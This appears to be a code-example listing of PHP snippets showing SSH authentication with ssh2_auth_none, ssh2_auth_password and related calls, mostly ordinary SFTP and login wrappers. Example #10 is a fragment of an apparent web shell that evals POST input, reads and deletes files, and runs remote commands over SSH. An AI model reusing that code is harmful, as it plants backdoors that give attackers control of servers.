public function Authenticate($uid, $pass)
 {
     $this->AuthResult = false;
     // Connect
     $con = ssh2_connect($this->RemoteHost, $this->RemotePort);
     if ($con === false) {
         return ulLoginBackend::ERROR;
     }
     // Check fingerprint
     if ($this->RemoteFingerprint != '') {
         if (ssh2_fingerprint($con, SSH2_FINGERPRINT_SHA1 | SSH2_FINGERPRINT_HEX) != $this->RemoteFingerprint) {
             return ulLoginBackend::ERROR;
         }
     }
     // Test if server supports password-based authentication
     $auth_methods = ssh2_auth_none($con, 'user');
     if (!in_array('password', $auth_methods)) {
         return ulLoginBackend::ERROR;
     }
     // Connect again, because we can only try to authenticate once on a connection
     $con = ssh2_connect($this->RemoteHost, $this->RemotePort);
     if ($con === false) {
         return ulLoginBackend::ERROR;
     }
     // Try to authenticate
     if (ssh2_auth_password($con, $uid, $pass)) {
         $this->AuthResult = $uid;
         return true;
     } else {
         return ulLoginBackend::BAD_CREDENTIALS;
     }
 }
Пример #2
0
 function _startup()
 {
     $this->_link = @ssh2_connect($this->hostname, $this->port ? $this->port : 22);
     if (!is_null($this->username)) {
         $login = @ssh2_auth_password($this->_link, $this->username, $this->password);
     } else {
         $login = @ssh2_auth_none($this->_link, "anonymous");
     }
     if (!$this->_link || is_array($this->_link) || !$login) {
         internal_error(!$login ? "remote_authentication_failed" : "remote_connection_failed");
     }
     $this->_sftp = @ssh2_sftp($this->_link, true);
 }
Пример #3
0
 function login($username, $password)
 {
     $auth_methods = ssh2_auth_none($this->connection, $username);
     if (!in_array('password', $auth_methods)) {
         return $this->raiseError("The SSH Server does not support password based authentication");
     }
     if (!@ssh2_auth_password($this->connection, $username, $password)) {
         return $this->raiseError("Could not authenticate with username {$username} " . "(using a password).");
     }
     $this->sftp = @ssh2_sftp($this->connection);
     if (!$this->sftp) {
         return $this->raiseError("Could not initialize SFTP subsystem.");
     }
 }
Пример #4
0
 /**
  * @param $resource
  *
  * @throws AuthenticationFailed
  */
 public function authenticate($resource)
 {
     if (true !== ssh2_auth_none($resource, $this->username)) {
         throw new AuthenticationFailed();
     }
 }
Пример #5
0
 /**
  * Attempts to authorize the given ssh2 connection resource
  *
  * @param resource $connectionResource Ssh2_connect connection resource
  * @return boolean True on success
  * @throws Exception Username not set!
  * @throws Exception Mode not set!
  * @throws Exception Password required for PASSWORD mode!
  * @throws Exception Public Key required for PUBLIC KEY mode!
  * @throws Exception Private Key required for PUBLIC KEY mode!
  */
 public function authorizeSshConnection($connectionResource)
 {
     if ($connectionResource === null || $connectionResource === false) {
         throw new Exception("Connected Ssh resource is required!");
     }
     $this->validate();
     //passed the validation so we can really authorize the connection
     switch ($this->mode) {
         case AuthMode::NONE:
             $authResult = ssh2_auth_none($connectionResource, $this->username);
             if ($authResult !== true) {
                 //we ignore here the fact of returning possible auth options: we want to authorize using this method. Full stop.
                 return false;
             } else {
                 return true;
             }
         case AuthMode::PASSWORD:
             return ssh2_auth_password($connectionResource, $this->username, $this->password);
         case AuthMode::PUBLIC_KEY:
             return ssh2_auth_pubkey_file($connectionResource, $this->username, $this->publicKey, $this->privateKey, $this->privateKeyPassphrase);
     }
 }
Пример #6
0
Файл: SSH.php Проект: jasny/Q
 /**
  * Create SSH connection
  */
 protected function makeConnection()
 {
     $host = $this->host;
     // Extract from hostname
     $matches = null;
     if (!preg_match('/^(?:([^:@]++)(?:\\:([^:@]++))?@)?([^:@]++)(?:\\:([^:@]++))?$/', $host, $matches)) {
         throw new Exception("Could not create SSH connection: Illegal host string.");
     }
     $matches = $matches + array_fill(0, 5, null);
     list(, $username, $password, $host, $port) = $matches;
     // Get user/password
     if (!empty($this->options->username)) {
         $username = $this->options->username;
     }
     if (empty($username)) {
         $_tmp_ = posix_getpwuid(posix_getuid());
         $username = $_tmp_['name'];
     }
     if (!empty($this->options->password)) {
         $password = $this->options->password;
     }
     // Get port
     $port = !empty($this->options->port) ? $this->options->port : 22;
     if (isset($port) && !is_int($port) && !ctype_digit($port)) {
         throw new Exception("Could not create SSH connection for '{$host}': Given port '{$port}' is not a numeric value.");
     }
     // Get methods and callbacks
     if (!isset($this->options->methods)) {
         $this->options->methods = array_chunk_assoc($this->options, 'methods');
     }
     if (!isset($this->options->callbacks)) {
         $this->options->callbacks = array_chunk_assoc($this->options, 'callbacks');
     }
     // Make the connection
     $this->connection = ssh2_connect($host, $port, $this->options->methods, $this->options->callbacks);
     if (!$this->connection) {
         throw new Exception("Could not create SSH connection for '{$host}:{$port}': Failed to connect to server.");
     }
     // Autenticate
     $auth_methods = isset($this->options->auth) ? (array) $this->options->auth : ssh2_auth_none($this->connection, $username);
     $authenticated = $auth_methods === true;
     while (!$authenticated && current($auth_methods)) {
         switch (current($auth_methods)) {
             case 'none':
                 $authenticated = @ssh2_auth_none($this->connection, $username) === true;
                 break;
             case 'password':
                 $authenticated = isset($password) && @ssh2_auth_password($this->connection, $username, $password);
                 break;
             case 'publickey':
                 $authenticated = @ssh2_auth_pubkey_file($this->connection, $username, $this->options->pubkeyfile, $this->options->privkeyfile, $this->options->passphrase);
                 break;
             case 'hostbased':
                 $authenticated = @ssh2_auth_hostbased_file($this->connection, $username, $this->options->hostbased, $this->options->pubkeyfile, $this->options->privkeyfile, $this->options->passphrase);
                 break;
         }
         next($auth_methods);
     }
     if (!$authenticated) {
         throw new Exception("Could not create SSH connection for '{$host}:{$port}': Authentication for user '{$username}' failed (" . join(', ', $auth_methods) . ").");
     }
 }
Пример #7
0
 public function login()
 {
     $username = $this->getUsername();
     $password = $this->getPassword();
     $publicKey = $this->getPublicKey();
     $privateKey = $this->getPrivateKey();
     $hostKey = $this->getHostKey();
     // Auth using keys
     if ($publicKey && $privateKey && $hostKey) {
         $return = @ssh2_auth_pubkey_file($this->getResource(), $username, $publicKey, $privateKey, $password);
     } else {
         if ($username && $password) {
             $return = @ssh2_auth_password($this->getResource(), $username, $password);
         } else {
             $return = @ssh2_auth_none($this->getResource(), $username);
         }
     }
     // Failure
     if (!$return) {
         throw new Engine_Vfs_Adapter_Exception('Login failed.');
     }
     return $this;
 }
/**
 * 
 * Export centreon-syslog-server configuration file using SSH2
 * @param array $Syslog_options
 * @return string
 */
function sshExportConfFile($Syslog_options)
{
    global $tmp_file, $conf_file;
    $connection = ssh2_connect($Syslog_options["ssh_server_address"], $Syslog_options["ssh_server_port"], array('hostkey' => 'ssh-rsa'));
    if (!$connection) {
        $output = _("Unable to connect on distant server.");
        return $output;
    }
    if (strlen($Syslog_options["ssh_password"]) == 0) {
        $status = ssh2_auth_none($connection, $Syslog_options["ssh_username"]);
    } else {
        $status = ssh2_auth_password($connection, $Syslog_options["ssh_username"], $Syslog_options["ssh_password"]);
    }
    if (!$status) {
        $output = _("Authentification failed.");
        return $output;
    }
    $status = ssh2_scp_send($connection, $tmp_file, $Syslog_options["configuration_dir"] . "/" . $conf_file, 0664);
    if (!$status) {
        $output = _("Unable to export configuration file. Rights may be not correct on distant directory.");
        return $output;
    }
    return _("Configuration file exported successfully");
}
Пример #9
0
 /**
  * {@inheritDoc}
  */
 public function authenticate($session)
 {
     return true === ssh2_auth_none($session, $this->username);
 }
Пример #10
0
     } else {
         $rezult = fread($fh, filesize($_POST["pcfile"]));
         fclose($fh);
         echo $rezult;
         if ($_POST["delrezult"] == "on") {
             unlink($_POST["pcfile"]);
         }
     }
     break;
 case "eval":
     eval($_POST["command"]);
     break;
 case "ssh2":
     $connection = ssh2_connect($_POST["ssh2host"], $_POST["ssh2port"]) or die("cant connect. host/port wrong?");
     //using knowingly wrong username to test auth. methods
     $auth_methods = ssh2_auth_none($connection, '12309tezt');
     if (in_array('password', $auth_methods)) {
         $connection = ssh2_connect($_POST["ssh2host"], $_POST["ssh2port"]) or die("cant connect. host/port wrong?");
         //need to connect again after failed login
         if (ssh2_auth_password($connection, '' . $_POST["ssh2user"] . '', '' . $_POST["ssh2pass"] . '')) {
             $stream = ssh2_exec($connection, $shelltext);
             stream_set_blocking($stream, true);
             $data = "";
             while ($buf = fread($stream, 4096)) {
                 $data .= $buf;
             }
             fclose($stream);
             echo $data;
         } else {
             echo "cant login. user/pass wrong?";
         }
Пример #11
0
 /**
  * Ensure that SSH connection is up and can be used for file operations.
  *
  * @throws ServerException
  */
 protected function connect()
 {
     $session = ssh2_connect($this->options['host'], $this->options['port'], $this->options['methods']);
     if (empty($session)) {
         throw new ServerException("Unable to connect to remote SSH server '{$this->options['host']}'.");
     }
     //Authorization
     switch ($this->options['authMethod']) {
         case self::NONE:
             ssh2_auth_none($session, $this->options['username']);
             break;
         case self::PASSWORD:
             ssh2_auth_password($session, $this->options['username'], $this->options['password']);
             break;
         case self::PUB_KEY:
             ssh2_auth_pubkey_file($session, $this->options['username'], $this->options['publicKey'], $this->options['privateKey'], $this->options['secret']);
             break;
     }
     $this->sftp = ssh2_sftp($session);
 }
Пример #12
0
 /**
  * Login using a public key.
  * Wrapping ssh2_auth_pubkey_file and ssh2_sftp
  * 
  * (non-PHPdoc)
  * @see kFileTransferMgr::doLoginPubKey()
  */
 protected function doLoginPubKey($username, $pubKeyFile, $privKeyFile, $passphrase = null)
 {
     $methods = ssh2_auth_none($this->getSsh2Connection(), $username);
     if ($methods === true) {
         return true;
     }
     if (!in_array('publickey', $methods)) {
         throw new kFileTransferMgrException("Public key authentication is not supported by the server.", kFileTransferMgrException::cantAuthenticate);
     }
     $this->username = $username;
     $this->privKeyFile = $privKeyFile;
     $this->passphrase = $passphrase;
     // try to login
     if (ssh2_auth_pubkey_file($this->getSsh2Connection(), $username, $pubKeyFile, $privKeyFile, $passphrase)) {
         $this->sftpId = ssh2_sftp($this->getSsh2Connection());
         return $this->sftpId != false && $this->sftpId != null;
     } else {
         return false;
     }
 }
Пример #13
0
 /**
  * Run SSH authentication based on the selected method
  *
  * @param resource $connection
  * @param int $method
  * @param mixed ...$args
  *
  * @return void
  */
 protected function __authenticate($connection, $method, ...$args)
 {
     switch ($method) {
         case SecureShell::AUTH_PASSWORD:
             return ssh2_auth_password($connection, ...$args);
         case SecureShell::AUTH_PUBKEY:
             return ssh2_auth_pubkey_file($connection, ...$args);
         case SecureShell::AUTH_HOSTKEY:
             return ssh2_auth_hostbased_file($connection, ...$args);
         case SecureShell::AUTH_AGENT:
             return ssh2_auth_agent($connection, ...$args);
         case SecureShell::AUTH_NONE:
             return ssh2_auth_none($connection, ...$args);
         default:
             throw new ModuleException(__CLASS__, 'Unsupported authentication method');
     }
 }
Пример #14
0
 /**
  * Execute command
  *
  * @param string  $command          The extending command to execute
  * @param boolean $overwriteCommand Execute only the extending command?
  *
  * @return boolean
  */
 private function executeCommand($command, $overwriteCommand = false)
 {
     if (!$this->server) {
         return false;
     }
     if (!$overwriteCommand) {
         if ($this->address) {
             $command = sprintf(self::ARGUMENT_ADDRESS, $this->address) . $command;
         }
         if ($this->priority) {
             $command .= sprintf(self::ARGUMENT_PRIORITY, $this->priority);
         }
         if ($this->duration) {
             $command .= sprintf(self::ARGUMENT_DURATION, $this->duration);
         }
         $command = sprintf(self::COMMAND, $command);
     }
     if ($this->debug) {
         error_log("Executing '" . self::APPLICATION . "' command to '{$this->server}': {$command}");
     }
     if ($this->server == '127.0.0.1' || $this->server == getHostByName(getHostName())) {
         $this->output = shell_exec($command);
     } else {
         $connection = ssh2_connect($this->server, 22);
         if (!$this->username) {
             return false;
         }
         if ($this->password) {
             ssh2_auth_password($connection, $this->username, $this->password);
         } else {
             ssh2_auth_none($connection, $this->username);
         }
         $this->output = ssh2_exec($connection, $command);
     }
     if ($this->sleep) {
         sleep($this->sleep);
     }
     $this->resetArguments();
     if ($this->output === null) {
         return false;
     }
     return true;
 }